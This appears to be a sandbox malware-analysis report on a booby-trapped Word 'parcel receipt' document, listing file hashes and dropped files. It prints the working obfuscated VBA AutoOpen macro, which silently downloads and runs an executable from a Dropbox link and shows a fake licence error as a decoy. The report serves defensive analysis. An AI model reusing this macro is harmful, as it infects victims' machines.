Malicious Word Doc. Uses Multiple Sandbox Evasion Techniques | Files
File Information
Sample files count 1
Created files count 45
Modified files count 6
c:\users\aetadzjz\desktop\receipt-parcel-UK980-456.doc
File Properties
Names c:\users\aetadzjz\desktop\receipt-parcel-UK980-456.doc (Sample File)
Size 109.00 KB (111616 bytes)
Hash Values MD5: 1dfa6c28e296b4196f92c8b97e050754
SHA1: b8c701c3a0059820ee60111aa3cc6add2dbc33d0
SHA256: 880b352d1186a1c33d73a42907ee9b9902363c2358fe9f0c540c776602093772
VBA Information
VBA Properties
Module Count 1
Macro Count 3
NewMacros.bas - Activate Workbook
Sub AutoOpen()
    Dim OGADJTPBNNVIKR As String
    Dim FMBVJVBB As String
    OGADJTPBNNVIKR = OGADJTPBNNVIKR & VRUOAIRHKHHTMF("fpg1h{h 2f %zdlw") & VRUOAIRHKHHTMF("iru 2w 8 \NHUT ) elw") & VRUOAIRHKHHTMF("vdgplq 2wudqvihu ") & VRUOAIRHKHHTMF("X") & VRUOAIRHKHHTMF("NHI ") & VRUOAIRHKHHTMF("2grzqord") & VRUOAIRHKHHTMF("g 2sulrulw| qrupdo kwwsv=22zz") & VRUOAIRHKHHTMF("z1gurser{1frp2v2:e<66")
    OGADJTPBNNVIKR = OGADJTPBNNVIKR & VRUOAIRHKHHTMF("5u9yplxk{o24") & VRUOAIRHKHHTMF("thv|r}dqdqul") & VRUOAIRHKHHTMF("yr{l") & VRUOAIRHKHHTMF("w|ri1h{hBgo@4 (dssgdwd(_lxr") & VRUOAIRHKHHTMF("ogz1h{h )vwduw (dssgdwd(_lxro") & VRUOAIRHKHHTMF("gz1h{h%")

    FMBVJVBB = FMBVJVBB & VRUOAIRHKHHTMF("Huuru 4<;:7= \rx p") & VRUOAIRHKHHTMF("xvw kdyh Riilfh Surihvvl") & VRUOAIRHKHHTMF("rqdo Hglwlrq wr uhdg") & VRUOAIRHKHHTMF(" wklv frq") & VRUOAIRHKHHTMF("whqw/ sohdvh x") & VRUOAIRHKHHTMF("sjudgh |rxu o") & VRUOAIRHKHHTMF("lfhqfh1 Ylvlw z") & VRUOAIRHKHHTMF("zz1plfurvriw1frp ir")
    FMBVJVBB = FMBVJVBB & VRUOAIRHKHHTMF("u kho") & VRUOAIRHKHHTMF("s")
    
    Shell OGADJTPBNNVIKR, vbHide
    MsgBox FMBVJVBB
End Sub
NewMacros.bas - Eventless
Private Function KDFNHXYJY(ByVal ZXUXMWSDNWUXFKZROLAKXAXFS As String, ByVal UIZLJHCZYXCKDO As Long) As String
    Dim NIFULPKBRS As Long
    NIFULPKBRS = Len(ZXUXMWSDNWUXFKZROLAKXAXFS)
    Dim KSTUELH As String
    Dim ELNWJPYGEKSJKWJXKKAAHOPC As Long
    Dim RZTNAMICZ As Long
    Dim WTBWUKRWBTLKFVPIDGVYKDKCX() As Long
    ReDim WTBWUKRWBTLKFVPIDGVYKDKCX(1 To NIFULPKBRS)
    For RZTNAMICZ = 1 To NIFULPKBRS
        ELNWJPYGEKSJKWJXKKAAHOPC = Asc(Mid(ZXUXMWSDNWUXFKZROLAKXAXFS, RZTNAMICZ, 1))
        If ELNWJPYGEKSJKWJXKKAAHOPC = 32 Then
            WTBWUKRWBTLKFVPIDGVYKDKCX(RZTNAMICZ) = ELNWJPYGEKSJKWJXKKAAHOPC
        Else:
            ELNWJPYGEKSJKWJXKKAAHOPC = ELNWJPYGEKSJKWJXKKAAHOPC - UIZLJHCZYXCKDO
            WTBWUKRWBTLKFVPIDGVYKDKCX(RZTNAMICZ) = ELNWJPYGEKSJKWJXKKAAHOPC
        End If
        KSTUELH = KSTUELH & Chr(WTBWUKRWBTLKFVPIDGVYKDKCX(RZTNAMICZ))
    Next
    KDFNHXYJY = KSTUELH
End Function
Private Function VRUOAIRHKHHTMF(IKJKBSKNJNPOGLRADOUVBMSFL As String)
  VRUOAIRHKHHTMF = KDFNHXYJY(IKJKBSKNJNPOGLRADOUVBMSFL, 3)
End Function
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin, ...
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin (Created File)
Size 0.00 KB (0 bytes)
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, ...
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe (Created File)
c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe (Created File)
(Process Dump)
Size 192.00 KB (196608 bytes)
Hash Values MD5: 71c63dd6822598c7f7c7ab4c9ceb6ba9
SHA1: 854db67ad532a4af63443f8e6f684762e3c9efca
SHA256: 99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083
PE Information
File Properties
Image Base 0x400000
Entry Point 0x401068
Size Of Code 0x2e000
Size Of Initialized Data 0x4000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2018-01-10 23:01:33
Compiler/Packer Unknown
Sections (3)
Name   Virtual Address  Virtual Size  Raw Data Size  Raw Data Offset  Flags                                      Entropy
.text  0x401000         0x2d8e4       0x2e000        0x1000           CNT_CODE, MEM_EXECUTE, MEM_READ            7.11
.data  0x42f000         0x296c        0x0            0x0              CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE  0.0
.rsrc  0x432000         0xd58         0x1000         0x2f000          CNT_INITIALIZED_DATA, MEM_READ             2.76
Imports (9)
MSVBVM60.DLL (9)
API Name                   Ordinal  IAT Address  Thunk RVA  Thunk Offset
MethCallEngine             0x0      0x401000     0x2e82c    0x2e82c
(by ordinal)               0x207    0x401004     0x2e830    0x2e830
EVENT_SINK_AddRef          0x0      0x401008     0x2e834    0x2e834
DllFunctionCall            0x0      0x40100c     0x2e838    0x2e838
EVENT_SINK_Release         0x0      0x401010     0x2e83c    0x2e83c
EVENT_SINK_QueryInterface  0x0      0x401014     0x2e840    0x2e840
__vbaExceptHandler         0x0      0x401018     0x2e844    0x2e844
(by ordinal)               0x2ad    0x40101c     0x2e848    0x2e848
(by ordinal)               0x64     0x401020     0x2e84c    0x2e84c
c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat
File Properties
Names c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat (Created File)
Size 0.20 KB (200 bytes)
Hash Values MD5: b1dd1aa15fb939d335f5c39a8ed85ab8
SHA1: 3ea3a7be8ec7b7cce6e9cc1b52c77199858119a6
SHA256: 8ba84a14936373863bb48478a9c13ac8d67e08ff26a4eb5c6bd88237587e6ffd
c:\users\aetadzjz\appdata\local\temp\cab4336.tmp, ...
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cab4336.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab43c5.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab5979.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab7a2e.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab7a4f.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab7a70.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab85a9.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabaed4.tmp (Created File)
Size 52.71 KB (53978 bytes)
Hash Values MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
c:\users\aetadzjz\appdata\local\temp\tar4337.tmp, ...
File Properties
Names c:\users\aetadzjz\appdata\local\temp\tar4337.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar43c6.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar597a.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar7a2f.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar7a50.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar7a71.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar85b9.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\taraed5.tmp (Created File)
Size 126.77 KB (129813 bytes)
Hash Values MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
File Properties
Names c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.33 KB (342 bytes)
Hash Values MD5: cd4e3ab8068c33a6b3aec816fe51f106
SHA1: 71c4541a08b266e8e0ba9c0c7f91742e9b5a3511
SHA256: 8740ce6d272bdc6b54ae4c2e5e4aaf9ab3d2272be470d388ba276d79c51febe2
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\sgw[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\sgw[1].txt (Created File)
Size 5.65 KB (5784 bytes)
Hash Values MD5: 9d4f7d11a38b13abfffb23c26855ef96
SHA1: a439414520213ebc9e009ef0280efbc4c442506c
SHA256: e73f65e4321a8a5af6a80097a853cd49fd7a3eedd72bfdee47a3eab0a0015663
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv (Created File)
Size 1.73 KB (1776 bytes)
Hash Values MD5: f3963866cf1b0a9cae95cf0ec6aae77e
SHA1: 946fa1fe444c25648522407a7c690ea43e0d3837
SHA256: b4710fc930d2add348793b3160ed9c45b24ee8dcae605ee8ae198c107ef43285
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dw[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dw[1].txt (Created File)
Size 3.15 KB (3224 bytes)
Hash Values MD5: aa11e7edd31a5aa3003171b3ce6a1e63
SHA1: 19f920fe20fb0368145fe224cbb6bc93c1c5db86
SHA256: c39527e8fc3c7154327298c32145bc51f21ab57c71297a374b89d95b46500b89
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig (Created File)
Size 0.70 KB (720 bytes)
Hash Values MD5: 084cd34da60abfe463f4bcdf6ff6c7c4
SHA1: 376783a4491e556cf55f5b6d3f5ef8edcb6d4faa
SHA256: ceddead7e5868e0d0bd135ad23248b1c6562111ccb65bdba7e1cc37314c02712
c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat (Modified File)
Size 64.00 KB (65536 bytes)
Hash Values MD5: ee5b2511cdb5b31e4749e5955ca9a85a
SHA1: 315d35255f49ceb0f944a7b847a67ec7f9ef15b5
SHA256: 87b654ae60929fec10edbdc471e9afebfac63a157ea6fceaeb4a6445690b26af
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt
File Properties
Names c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt (Created File)
Size 0.27 KB (281 bytes)
Hash Values MD5: 7372fbe29d49e31bd4002a12ff10b319
SHA1: b49450a4a7844b312769bd7ae0628aa1f0426efe
SHA256: 1e52ee6f27cb7c984dc23b4cd48c641438fcff2a7dc3048b04fedc51476202c4
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt (Created File)
Size 48.62 KB (49787 bytes)
Hash Values MD5: 5bce4a525f0d6dba211e09b60f144bf9
SHA1: 09f4d50cd2573e52623a19c40d987508d5c09bcb
SHA256: eb192368bd6677a889c70e4225d709baa19c2ac38c07c8fe116ff0da59deae00
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
File Properties
Names c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.33 KB (342 bytes)
Hash Values MD5: affe9cecdbfde660607fec2b5edaaa6f
SHA1: 4ef3b8e735708851cc283c0b6e3cfa2f5f46cd1e
SHA256: 08acb6e6b710a96bc80c48695117802596b7aaabae08f4db40cc37eacd7299de
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\yylw[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\yylw[1].txt (Created File)
Size 0.23 KB (236 bytes)
Hash Values MD5: 41f4b78b882df2ab9fdf5c2c60cc7c85
SHA1: 75d27da1d973a5d0bc1f246834e5e22591ca2732
SHA256: 905aa522a93e407c554a064d451edbd8f25f8afb70cbb0ab10d6a553aaeef1b6
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a6egg[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a6egg[1].txt (Created File)
Size 348.46 KB (356824 bytes)
Hash Values MD5: f7ae0d06a19a33310f2b33a9b91a0916
SHA1: c35f57e13fb999aeb678c8117af70714e5f38e9c
SHA256: 2d801bf8ce180123c447ef817c9385c298d1c08fb04a9f49042cd42e9e00f959
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qfmq[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qfmq[1].txt (Created File)
Size 5.65 KB (5784 bytes)
Hash Values MD5: ff63baf8441314e99b50f8e6205f2df8
SHA1: 1c5e1270872b75f9a1503ddc7bb22532257a8ed9
SHA256: 45b9ee8eb14ffc3692481095527cd8cc889b586f122ab5e43c0bb40ae390ef41
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\oa[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\oa[1].txt (Created File)
Size 5.65 KB (5784 bytes)
Hash Values MD5: ca0cc8ffcff1a13be2752132a8167d6b
SHA1: 3c0265be2ab965bf0ebf9382717bef9b815bec36
SHA256: 48b849dc7205c10f1daf557ea8e05a633bb9646eb1da5da89aac17c02014c0ad
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin, ...
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin (Created File)
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.tmp (Created File)
Size 0.17 KB (171 bytes)
Hash Values MD5: 1142692290abc4073f6cb4f996e782fa
SHA1: d71b914d853ef1017dda3d6a0cbd29127aac5730
SHA256: 6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\3q2naw[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\3q2naw[1].txt (Created File)
Size 3.15 KB (3224 bytes)
Hash Values MD5: 5dee0de1d90631b1fb9a8de697045c67
SHA1: bb4d81d7b0352e350ac345ae367c58cd8049017a
SHA256: c4da2e282d7bfa3faf20529d0e97b1baf05c41344e1da97a64e5ad96e1ec96f8
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt (Created File)
Size 156.73 KB (160492 bytes)
Hash Values MD5: f0acdd87a868572d89fe58cc771a4f44
SHA1: e12103983b81e7c4e19c7e432ae0736a028024dd
SHA256: 308880082e52bef445ba6ff2ac9fc91bceb550569768d2060114aa14a84a76fb
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\spsra[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\spsra[1].txt (Created File)
Size 200.17 KB (204972 bytes)
Hash Values MD5: 9cbb4d0e76c226eb847c4ef1a8b0d39c
SHA1: cff19e3d50f60e32157747873ba9e87cb1231de6
SHA256: f000b6a915fa937d682aa56bccc5b1c5c84df5c6de526a2ecb59a3399e4c49d6
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt (Created File)
Size 167.56 KB (171584 bytes)
Hash Values MD5: e00b057f92a763e5b783ca24b94a26ce
SHA1: c3b90637188b48431e1aea880a49393e669a300c
SHA256: 998b2fd31f18b2a97a5ab0548f5ea02d71f1f6bf69800e9b2d5b98db16322c2f
c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat
File Properties
Names c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat (Created File)
Size 0.21 KB (216 bytes)
Hash Values MD5: 98de219891ef24cceaa12d1c41436654
SHA1: 7ad5ad583dfd70ed21dd2acef592c931def67f0a
SHA256: 14facf8fc3da422ce17a7695d1261c86078c97436ea643bc4d153aeda0904a88
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[2].txt
File Properties
Names c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[2].txt (Created File)
Size 0.27 KB (279 bytes)
Hash Values MD5: 90de1992ceb330537fee8db14d5fd987
SHA1: b05f7371ddbfc73d7393445bd8d52048289f0a4f
SHA256: 6ea48ebb47ac6309a8a5d275563df6aaa2ad1a68f5a26dc2530d9a39ef9dd231
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt
File Properties
Names c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt (Created File)
Size 0.27 KB (278 bytes)
Hash Values MD5: 7e2935c87edf38621c63511a6cc5e1e3
SHA1: 148686c9adafa08e6d55351479da7be5b0bcf064
SHA256: d08ddc5f3a9bb51961871f0b0a8c840adb5828c8a986f1a730e330fef876c44f
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt (Created File)
Size 48.62 KB (49791 bytes)
Hash Values MD5: 9b930032eac8c180ed70390aee88903c
SHA1: 843bfe71d4c57d9fe1e0c8d270603ea4bd5f269f
SHA256: 888f2001ace08ab500701ae57772967f6b7df6b0c35a5472802077ef81289adb
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\hxqoq[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\hxqoq[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 23e04d8ef7cca29b1eeff7fa22c0c8e0
SHA1: 6af5fc031b6f31cef4e14b7056ea07441a79fbe9
SHA256: 73794646c8afa7e919476ff8095e4f5f2dd0caa3dfb7badc8620eb36b81c6307
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\eha[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\eha[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 948a64299b0f13ef15d1534c929c8908
SHA1: 707d2546cb7e3d6ef30084fa817b068ba299b48d
SHA256: a84e628a54c5000e94bf8026a5ccdd062d100a5c9f22827548b8eab8d745503c
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\2pg[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\2pg[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 082e064c3b994a31dc76874b48a6033d
SHA1: 5df5d513919f2c5373e46f4274c0ca043ec2d074
SHA256: 9a22b3e989be91a1ea151037471a153ef989117bb1215488e7e7c62f78c3424d
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\syrtq[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\syrtq[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 80fa0fcd69c77d3f984d712e6741c5b6
SHA1: a4a473c7457f6ef5ac8b037096151ee812c0547d
SHA256: c8f0e774f0ee04169b6dcb3c97df5b1c99325406fddd9afbe2039bbe0eebe74a
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 309cd930b3d4df7998a5aeb8f61ab194
SHA1: 9fe5095d059406cd2f92d58b9ac148cd5897450c
SHA256: fa3faba658be48400f8847bcf6f792362fbfd422ef8f80ba31ba4b02f346e609
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\tcmu_zldnrsala[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\tcmu_zldnrsala[1].txt (Created File)
Size 0.09 KB (88 bytes)
Hash Values MD5: 105ef3c8c5656d44bb9c7221446103cc
SHA1: 0a1aa89639d01e9ab3a76b0bc22911ec5033bc17
SHA256: bc9e231394912761cdff92d2ba0ccfe6ed8427198c17eb3e65b23e62d8c8d962
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dfa[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dfa[1].txt (Created File)
Size 0.19 KB (192 bytes)
Hash Values MD5: 6928ee150e77b6e370de79ff6ba859e2
SHA1: e200706435642973086f3659903ddcabf59d894f
SHA256: f0e4ff028c7f7c9a09ea8b29458ef9269108598cbdba2a50f384e6af67819c96
c:\users\aetadzjz\appdata\roaming\microsoft\windows\ietldcache\index.dat
File Properties
Names c:\users\aetadzjz\appdata\roaming\microsoft\windows\ietldcache\index.dat (Modified File)
Size 256.00 KB (262144 bytes)
Hash Values MD5: 8ed682d01fa076cced515bf6b21ba022
SHA1: e69667b35d101d9cd052697da198c40a88e16e74
SHA256: 4abb12ce35853bda9c190e84a3329ab50701e035b92436eba8f4ddf9b96e4e6c
c:\users\aetadzjz\appdata\local\temp\coob07b.tmp
File Properties
Names c:\users\aetadzjz\appdata\local\temp\coob07b.tmp (Created File)
Size 12.41 KB (12707 bytes)
Hash Values MD5: 60492a553dc3492eaea00299b9976477
SHA1: 296392a97cf91096c931293099654ac50dae95f3
SHA256: 8491814b3ee58612f1ce1d20022263ae3817af78a69f03b1af5b5e299591f6a4
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin (Created File)
Size 16.74 KB (17146 bytes)
Hash Values MD5: 18c3f549ae3ef0029f410aa06ca2ad50
SHA1: 2b599a6397db74b8e074dd3a38eb0d2aad8b3be9
SHA256: 4b2dba04ac1ce23a8d5c43f671a55182fdffb5e6a9366d0b019a1dae4afb7d53
c:\users\aetadzjz\appdata\local\temp\cabb08d.tmp
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cabb08d.tmp (Created File)
Size 0.20 KB (207 bytes)
Hash Values MD5: c8c975ff6c535bb9e0d34a332b334e8f
SHA1: 5bcbf5c63be57bb1512270a904424352081ab0ba
SHA256: 863a31200bc0cdd3ea7ee31ab2f086e67ac5ca67c561ce925c7bf2f87dbf16fe
c:\users\aetadzjz\appdata\local\temp\cabb08e.tmp, ...
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cabb08e.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cabb090.tmp (Created File)
Size 0.07 KB (68 bytes)
Hash Values MD5: 7f420b843841e2e85c7a9c66d0d02fa4
SHA1: 387c6e4328f6f441e32191f35f24bca95844ba69
SHA256: 511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c
c:\users\aetadzjz\appdata\local\temp\flab08c.tmp
File Properties
Names c:\users\aetadzjz\appdata\local\temp\flab08c.tmp (Created File)
Size 0.31 KB (319 bytes)
Hash Values MD5: 8f44eaade8a98a128f71e04667af8328
SHA1: 36ed9ceced094ab5345b34dc008176132de28716
SHA256: 1a367605ecf4ec581f19dfadb122ca1fdc37b47cd311e1fabd53cb12964254ba
c:\users\aetadzjz\appdata\local\temp\cabb08f.tmp
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cabb08f.tmp (Created File)
Size 0.20 KB (207 bytes)
Hash Values MD5: 497bb917bc24b0023d281c2fc2c236af
SHA1: 1c86d43980e988bfcabf57104b2101024696c184
SHA256: a75138a5451d7dbadddf6e4eb27dd6b3fccaf85b3e2af1af4f476d338a55dc2a
c:\users\aetadzjz\appdata\local\temp\cabb091.tmp
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cabb091.tmp (Created File)
Size 0.01 KB (8 bytes)
Hash Values MD5: 7b5b6c7bf41e6055abd4e74476e08575
SHA1: 5c05d3a68f69258d236f6d9677cc0a42e399e7cc
SHA256: 2392619f397925a165cf31634781d68b006c396611c425f6c67f338356e47f8f
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin (Created File)
Size 17.36 KB (17779 bytes)
Hash Values MD5: 734b4714f249866d6af2cd47b0929a3d
SHA1: 323502054d5c3e5294e62377d1626ed6261a4673
SHA256: c36c81a8858e6c68f06d494aa33406ce0c407d672b802f431d273877e507e05f
c:\users\aetadzjz\appdata\local\temp\sofb0d5.tmp
File Properties
Names c:\users\aetadzjz\appdata\local\temp\sofb0d5.tmp (Created File)
Size 1.05 KB (1072 bytes)
Hash Values MD5: aac3de092af58ca64dab1cc4b2186c5e
SHA1: 084512759ab2be3358f3bd1c3c4ef2f88871d01f
SHA256: 12ee0606b5290d5d363395ffc82a87b3ac1257cbab1a4a5179eeaafac1638bf6
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin (Created File)
Size 18.96 KB (19413 bytes)
Hash Values MD5: e485ce36ccb80721109792301f591596
SHA1: 61e99372d88b5d6412a3e465316e9622c3ff25d4
SHA256: 68a132e520254be9c0f568603076331efc9b54e89f2eafc538a0397faaee5f06
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qrq[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qrq[1].txt (Created File)
Size 391.61 KB (401004 bytes)
Hash Values MD5: f6e12d2f070ce6a5936fbed778034d4e
SHA1: 23f94e36ddf66ba3e25236ecc83d63fefea9dd77
SHA256: 1716764c1a99963323a4aa287ff8afe97385d4006ae778882ce7597336fa78b0
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ymg[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ymg[1].txt (Created File)
Size 487.84 KB (499544 bytes)
Hash Values MD5: 3e7b96a26127f8bbe978d5ec0ab2183c
SHA1: 707584fae1eee0b149da3e3d4c520b510ec6128b
SHA256: 8153879cf65226d01cfbc3962edde75fcd3da186adb1d73c3be1b5908517fd26
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\auniq[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\auniq[1].txt (Created File)
Size 20.77 KB (21272 bytes)
Hash Values MD5: dc4ceb44d8bb1310e487d691de717647
